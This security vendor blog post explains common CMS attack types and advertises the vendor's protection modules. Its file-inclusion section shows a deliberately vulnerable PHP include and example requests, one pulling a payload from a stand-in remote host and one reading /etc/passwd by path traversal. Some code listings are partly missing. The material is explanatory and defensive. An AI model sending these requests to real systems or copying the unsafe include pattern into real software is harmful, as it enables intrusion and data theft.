The most common CMS attack types
Daniel Mecsei

The most common CMS attack types

Nowadays, the Internet plays a huge part in our lives. It gets bigger and bigger every day, now it has more than one billion websites. Most of these sites are built with CMS which stands for Content Management System. It is a tool that provides an easy-to-use method for users without any programming skills in creating websites.

The most common CMSs are written in PHP because most shared-hosting providers only provide this way to share/operate your website with the community. According to the statistics, WordPress has the largest market share with 52%, followed by Joomla with only 6%.

The most common problem with open-source CMSs is security. You only get support from the community and you hear all the time that “More eyes, fewer vulnerabilities, greater security” from the open-source guys. But there is also a problem with this. The code is open-source, so anyone can study the system and can discover vulnerabilities that can be exploited.
Anybody can create a plugin or template which has its own bugs, and it will become outdated if the developer will not maintain that, but these are unusual targets for hackers. They search for security holes in the core modules, extensions and in the configuration settings.

The main reasons for finding these holes are:

  • Data manipulation
  • Accessing data
  • Phishing
  • Code execution

The most commonly used attacks are:

  • SQL Injection
  • File inclusion vulnerability
  • Cross-Site Scripting
  • Comment Spamming
  • Remote Command Execution
  • File Upload

Let’s check out these attack types.

SQL Injection

SQL injection is a data-driven code injection technique, which allows attackers to the spoof identification, data manipulation create/change/destroy), or privilege escalation.  SQL injection is one of the top 10 web application vulnerabilities.

You can find more information about this attack type in our previous blog post.

File Inclusion Vulnerability

This attack type is most commonly used in affecting web applications that are relying on a scripting runtime. This happens, when the application creates an executable path which uses the attacker-controlled variable, thus allowing the attacker to control which file is executed at runtime. This attack has two types:

  • Remote File Inclusion (RFI)
  • Local File Inclusion (LFI)

RFI occurs when the web application downloads and runs a remote file, on the other hand, LFI includes local files that contain attacker-controlled data (such as access logs, or previously uploaded files).

A minimal example for this:


1. 2.   if ( isset( $_GET['theme'] ) ) {  
3.     include( $_GET['theme'] . '.php' );  
4.   }  
5. ?>  


For the client side:

1.

 

2.      

7.       

8.  


A common request looks like:

1. /gettheme.php?theme=classic

But if we switch it to an URL address or to a common Unix/Linux file, then we can get some information about the system which runs the web page or we can also execute a remote code:

1. /gettheme.php?theme=http://verydangerous.com/danger.txt  
2. /gettheme.php?theme=../../../../etc/passwd

Cross-Site Scripting

Cross-Site Scripting (XSS) allows attackers to inject client-side scripts into web pages in order to obtain user credentials, deface web sites, or to insert malicious contents. It has many types, such as reflected (aka non-persistent), persistent, Self-XSS or Mutated XSS (mXSS). Fortunately, Bitninja can protect you from these attack types. For further information, please check it out our blog post.

Comment Spamming

Comment spamming is an uncommon attack type because of Captcha, reCaptcha (v1/v2), and other types of challenge-response tests.
The attacker posts random comments automatically in order to make his own site more visible for the search engines, show links to malicious websites, unwanted advertisements, etc.. Websites with comment posting option are targeted by this type of attack.

Remote Command Execution

Allows the attacker to execute operating system commands in a system shell with the same privileges as the vulnerable application. It commonly gets used by another vulnerability which uses it for uploading its own custom web applications in order to facilitate its work
We mostly catch requests to 
WSO, which is a PHP WebShell application.

With this web application tool, you get a lot of information about the server where the script is running, and you also get a File Manager, a Brute Force Tool for SQL, and a simple console for executing system commands on the server.

File Upload

It is a rare and not efficient type of attack. It is mostly used as a DOS (Denial of Service) attack because if the attacker uploads harmful files, or overwrites critical files, then your server will be unstable or you can get another type of attack from harmful files. The attacker (if there are no quota limits enabled on the server) can fill up disk space on the server by uploading large files to it or by uploading a lot of small files which leads to an inode exhaustion.

As you can see, the hackers have a wide selection of attack types and with them, they can DOS your site or they can even get their hands on sensitive information that are in your possession. Luckily, BitNinja can protect you with these modules:

  • DOS Protection
  • IP Reputation
  • Malware Detection
  • Web Application Firewall (WAF)

Share your ideas with us about this article

Previous posts

What should you know about honeypots and proactive threat detection?
Honeypots are a form of proactive threat detections. Proactive threat detection is the next step in improving an organization’s security posture. It has many significant advantages e.g. it provides information about the different kinds of threats attacking the organization and the possible vulnerabilities. It works like a trap A honeypot is a monitored resource that serves as a trap or a decoy against an attack or a threat. It is a security tool that helps to prevent, detect and to gather information about IT security issues. It prevents the threat from compromising its intende...
Introducing our new partner, FastComet
Two weeks ago we officially announced our new channeling partner, FastComet and today we would like to introduce them to you in details. They are based in the USA, a Hosting Company with huge popularity from all around the world. FastComet has partner companies like, Spam Experts, Grasshopper or CPanel, but the list could go on. Their overall rating is higher than that of the GoDaddy, 1&1, or HostGator. The company is highly reliable and provides premium 24/7 support to its clients, based on reviews collected by HostAdvice.  They provide excellent hosting services...